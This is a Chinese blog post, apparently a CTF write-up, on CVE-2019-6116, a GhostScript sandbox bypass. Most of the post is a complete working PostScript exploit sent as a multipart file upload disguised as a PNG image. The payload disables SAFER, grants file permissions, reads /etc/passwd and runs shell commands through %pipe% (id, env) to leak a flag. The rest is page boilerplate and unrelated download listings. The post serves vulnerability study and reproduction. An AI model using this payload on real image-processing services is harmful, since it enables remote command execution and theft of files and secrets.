通过上传恶意图片负载实现GhostScript 沙箱绕过获取到敏感信息(flag)

于 2023-11-23 19:53:11 发布
阅读量478 收藏 8
点赞数 11
分类专栏: ctf 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a5658442/article/details/134585108
版权

CVE-2019-6116 漏洞,导致攻击者可以执行任意命令/读取任意文件。

poc

执行命令id > /tmp/success && cat /tmp/success


Content-Disposition: form-data; name="file_upload"; filename="22.png"
Content-Type: image/png
 
%!PS
% extract .actual_pdfpaintproc operator from pdfdict
/.actual_pdfpaintproc pdfdict /.actual_pdfpaintproc get def
 
/exploit {
    (Stage 11: Exploitation...)=
 
    /forceput exch def
 
    systemdict /SAFER false forceput
    userparams /LockFilePermissions false forceput
    systemdict /userparams get /PermitFileControl [(*)] forceput
    systemdict /userparams get /PermitFileWriting [(*)] forceput
    systemdict /userparams get /PermitFileReading [(*)] forceput
 
    % update
    save restore
 
    % All done.
    stop
} def
 
errordict /typecheck {
    /typecount typecount 1 add def
    (Stage 10: /typecheck #)=only typecount ==
 
    % The first error will be the .knownget, which we handle and setup the
    % stack. The second error will be the ifelse (missing boolean), and then we
    % dump the operands.
    typecount 1 eq { null } if
    typecount 2 eq { pop 7 get exploit } if
    typecount 3 eq { (unexpected)= quit }  if
} put
 
% The pseudo-operator .actual_pdfpaintproc from pdf_draw.ps pushes some
% executable arrays onto the operand stack that contain .forceput, but are not
% marked as executeonly or pseudo-operators.
%
% The routine was attempting to pass them to ifelse, but we can cause that to
% fail because when the routine was declared, it used `bind` but many of the
% names it uses are not operators and so are just looked up in the dictstack.
%
% This means we can push a dict onto the dictstack and control how the routine
% works.
<<
    /typecount      0
    /PDFfile        { (Stage 0: PDFfile)= currentfile }
    /q              { (Stage 1: q)= } % no-op
    /oget           { (Stage 3: oget)= pop pop 0 } % clear stack
    /pdfemptycount  { (Stage 4: pdfemptycount)= } % no-op
    /gput           { (Stage 5: gput)= }  % no-op
    /resolvestream  { (Stage 6: resolvestream)= } % no-op
    /pdfopdict      { (Stage 7: pdfopdict)= } % no-op
    /.pdfruncontext { (Stage 8: .pdfruncontext)= 0 1 mark } % satisfy counttomark and index
    /pdfdict        { (Stage 9: pdfdict)=
        % cause a /typecheck error we handle above
        true
    }
>> begin <<>> <<>> { .actual_pdfpaintproc } stopped pop
(Should now have complete control over ghostscript, attempting to read /etc/passwd...)=
 
% Demonstrate reading a file we shouldnt have access to.
(/etc/passwd) (r) file dup 64 string readline pop == closefile
 
(Attempting to execute a shell command...)= flush
 
% run command
(%pipe%id > /tmp/success && cat /tmp/success) (w) file closefile
 
(All done.)=
 
quit
------WebKitFormBoundarys13cRQYwUnOweCS8--

执行命令env > /tmp/success && cat /tmp/success

石榴煎酒这
关注
  • 11
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-16509
qq_51577576的博客
12-07 729
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-16509 CVE-2018-16509是由于GhostScript在处理/invalidaccess异常时,程序没有正确的检测restoration of privilege(权限恢复),导致攻击者可通过提交特制的PostScript利用该漏洞执行代码。
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-19475
qq_51577576的博客
12-17 712
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-19475 CVE-2018-19475是CVE-2018-16509的变体,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令。
Ghostscript沙箱绕过(CVE-2021-3781)分析
Tencent_SRC的博客
10-29 1428
文|腾讯蓝军 路飞0x00 前言Ghostscript是一款Adobe PostScript语言和PDF的解释器软件,被诸多著名应用(如ImageMagick)所使用。9月5日,海外安全研...
GhostScript沙箱绕过漏洞复现(CVE-2018-16509)
weixin_69925635的博客
07-21 227
GhostScript沙箱绕过漏洞复现(CVE-2018-16509)
GhostScript 沙箱绕过(命令执行)漏洞(CVE-2019-6116)
黑白的博客
12-23 833
声明 好好学习,天天向上 漏洞描述 2019年1月23日晚,Artifex官方在ghostscriptf的master分支上提交合并了多达6处的修复。旨在修复 CVE-2019-6116 漏洞,该漏洞由 Google 安全研究员 taviso 于2018年12月3日提交。该漏洞可以直接绕过 ghostscript 的安全沙箱,导致攻击者可以执行任意命令/读取任意文件。 ghostscript应用广泛,ImageMagick、python-matplotlib、libmagick 等图像处理应用均有引用。 影
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2019-6116
qq_51577576的博客
12-13 760
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2019-6116 CVE-2019-6116可以直接绕过 ghostscript 的安全沙箱,导致攻击者可以执行任意命令/读取任意文件。
GhostScript 沙箱绕过(命令执行)CVE-2018-16509/6116/19475/ 漏洞
weixin_51387754的博客
11-24 1024
标题 browse——ghost.png 提交 submit Query
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8418
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
简历-求职简历-word-文件-简历模版免费分享-应届生-高颜值简历模版-个人简历模版-简约大气-大学生在校生-求职-实习
08-25
简历-求职简历-word-文件-简历模版免费分享-应届生-高颜值简历模版-个人简历模版-简约大气-大学生在校生-求职-实习 简历是展示个人经历、技能和能力的重要文档,以下是一个常见的简历格式和内容模板,供您参考: 简历格式: 头部信息:包括姓名、联系方式(电话号码、电子邮件等)、地址等个人基本信息。 求职目标(可选):简短描述您的求职意向和目标。 教育背景:列出您的教育经历,包括学校名称、所学专业、就读时间等。 工作经验:按时间顺序列出您的工作经历,包括公司名称、职位、工作时间、工作职责和成就等。 技能和能力:列出您的专业技能、语言能力、计算机技能等与职位相关的能力。 实习经验/项目经验(可选):如果您有相关实习或项目经验,可以列出相关信息。 获奖和荣誉(可选):列出您在学术、工作或其他领域获得的奖项和荣誉。 自我评价(可选):简要描述您的个人特点、能力和职业目标。 兴趣爱好(可选):列出您的兴趣爱好,展示您的多样性和个人素质。 参考人(可选):如果您有可提供推荐的人员,可以在简历中提供其联系信息。 简历内容模板: 姓名: 联系方式: 地址: 求职目标: (简短描述您的求职意
JAVA版基于netty的物联网高并发智能网关
08-25
JAVA版基于netty的物联网高并发智能网关
粮食波动率等相关农业数据(2011-2022)(全新整理)
08-25
1、资源内容地址:https://blog.csdn.net/2301_79696294/article/details/141441802 2、代码特点:今年全新,手工精心整理,放心引用,数据来自权威,相对于其他人的控制变量数据准确很多,适合写论文做实证用 ,不会出现数据造假问题 3、适用对象:大学生,本科生,研究生小白可用,容易上手!!! 3、课程引用: 经济学,地理学,城市规划与城市研究,公共政策与管理,社会学,商业与管理 数据内容: 1.人均粮食产量 2.粮食总产量 3.粮食产量波动率((当年粮食产量-历年粮食产量均值)/均值):粮食生产受自然因素和市场等经济社会因素影响较大,常常表现出一定的波动。粮食产量波动率是衡量粮食生产稳定能力的重要指标之一。粮食产量波动率 Rt=(Yt−Yt')/Yt',其中 Yt表示 t 年粮食总产量,Yt' 表示粮食产量 5 年移动平均值。 4.粮食播种面积 5.粮食单位面积产量 6.谷物/非谷物产量 7.秋收/夏收粮食产量 8.粮食进口数量 9.粮食进口金额 10.粮食出口金额 11.粮食外贸依存度(粮食进出口总额/农业
基于微信小程序高校寻物平台设计与实现.docx
08-25
基于微信小程序高校寻物平台设计与实现.docx
ant-design-3.20.3.zip
08-25
ant-design,一套企业级 UI 设计语言和 React 组件库 提炼自企业级中后台产品的交互语言和视觉风格 开箱即用的高质量 React 组件
中国分省份市场化指数报告2008-2019
08-25
:中国分省份市场化指数报告(2021):作者王小鲁、胡李鹏、樊纲2021年11月 9日,由国民经济研究所,社会科学文献出版社共同主办的《中国分省份市场化指数报告( 2021)》(中国经济体制改革研究会课题,由国民经济研究所完成,作者王小鲁、胡李 鹏、樊纲).
孙亮付费v8来自九七泛滥.zip
08-25
孙亮付费v8来自九七泛滥.zip
ant-design-4.13.1.zip
最新发布
08-25
ant-design,一套企业级 UI 设计语言和 React 组件库 提炼自企业级中后台产品的交互语言和视觉风格 开箱即用的高质量 React 组件
人工智能+机器学习+机器学习概述+深入理解机器学习原理
08-25
机器学习‌是一门多领域交叉学科,涉及概率论、统计学、逼近论、凸分析、算法复杂度理论等多门学科。它专门研究计算机怎样模拟或实现人类的学习行为,以获取新的知识或技能,并重新组织已有的知识结构,使之不断改善自身的性能。机器学习是人工智能的核心,是使计算机具有智能的根本途径。人工智能和机器学习密不可分,机器学习是实现人工智能的一种有效途径。人工智能提供了实现智能行为的目标,而机器学习则提供了实现这一目标的工具和方法。随着技术的发展和创新,机器学习技术正在推动人工智能在各个领域取得突破性进展‌。 机器学习可以分为几种主要类型,包括监督学习、无监督学习、半监督学习和强化学习。每种类型都有其特定的应用场景和方法。例如,监督学习是机器学习的一种方法,其中算法从标记数据中学习模式和关系,以便对新数据进行预测。监督学习的目标是建立一个函数模型,该模型可以将输入映射到期望的输出。这个过程包括数据准备、模型选择、训练、评估和测试等步骤‌。
基于Springboot和vue的 汽车租赁管理系统源码 汽车租赁管理系统代码(高分毕设项目源码)
08-25
1. 汽车租赁管理系统代码说明:经导师指导并认可通过的98分毕设项目代码。 2.适用对象:本代码学习资料适用于计算机、电子信息工程、数学等专业正在做毕设的学生,需要项目实战练习的学习者,也适用于课程设计、期末大作业。 3.技术栈:前端是vue,后端是Springboot,项目代码都经过严格调试,代码没有任何bug! 4. 作者介绍:大厂码农,java领域创作者,阿里云开发社区乘风者计划专家博主,专注于大学生项目实战开发,文章底部有博主联系方式,更多优质系统、项目定制请私信。 5. 最新计算机软件毕业设计选题大全: https://blog.csdn.net/weixin_45630258/article/details/135901374
linux下 如何从ps文件中获取到打印方向 要用C语言实现
05-27
要从ps文件中获取打印方向,您可以使用C语言中的libgs库,该库是Ghostscript的C语言接口。以下是一个简单的示例程序,用于获取ps文件的打印方向: ```c #include <stdio.h> #include <string.h> #include "ghostscript/gdevdsp.h" #include "ghostscript/iapi.h" int main(int argc, char *argv[]) { int code; gsapi_revision_t r; gsapi_instance *instance; const char *filename = "test.ps"; // 替换为您的ps文件名 FILE *file; long file_size; char *file_buffer; int orientation; // 初始化Ghostscript code = gsapi_revision(&r, sizeof(r)); if (code < 0) { printf("Failed to initialize Ghostscript\n"); return 1; } code = gsapi_new_instance(&instance, NULL); if (code < 0) { printf("Failed to create Ghostscript instance\n"); return 1; } // 打开ps文件并读取其内容 file = fopen(filename, "rb"); if (!file) { printf("Failed to open input file\n"); return 1; } fseek(file, 0, SEEK_END); file_size = ftell(file); fseek(file, 0, SEEK_SET); file_buffer = (char *) malloc(file_size + 1); fread(file_buffer, file_size, 1, file); fclose(file); file_buffer[file_size] = 0; // 设置Ghostscript参数 gsapi_set_arg_encoding(instance, GS_ARG_ENCODING_UTF8); gsapi_set_stdio(instance, NULL, stdout, stderr); // 初始化Ghostscript code = gsapi_init_with_args(instance, argc, argv); if (code < 0) { printf("Failed to initialize Ghostscript instance\n"); return 1; } // 处理ps文件并获取打印方向 code = gsapi_run_string_begin(instance, 0, &orientation); if (code == 0) { code = gsapi_run_string_continue(instance, file_buffer, file_size, 0, &orientation); } if (code == 0) { code = gsapi_run_string_end(instance, 0, &orientation); } if (code < 0) { printf("Failed to process input file\n"); return 1; } if (orientation == 0) { printf("Vertical orientation\n"); } else if (orientation == 1) { printf("Horizontal orientation\n"); } else { printf("Unknown orientation\n"); } // 关闭Ghostscript gsapi_exit(instance); gsapi_delete_instance(instance); free(file_buffer); return 0; } ``` 在这个例子中,我们使用Ghostscript的C语言接口来处理ps文件并获取打印方向。我们首先打开ps文件并读取其内容,然后使用`gsapi_init_with_args`函数初始化Ghostscript实例并设置参数。接下来,我们使用`gsapi_run_string_begin`、`gsapi_run_string_continue`和`gsapi_run_string_end`函数来处理ps文件并获取打印方向。最后,我们使用`gsapi_exit`和`gsapi_delete_instance`函数关闭Ghostscript实例并释放内存。 请注意,这只是一个简单的示例程序,您可能需要根据实际情况进行修改。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值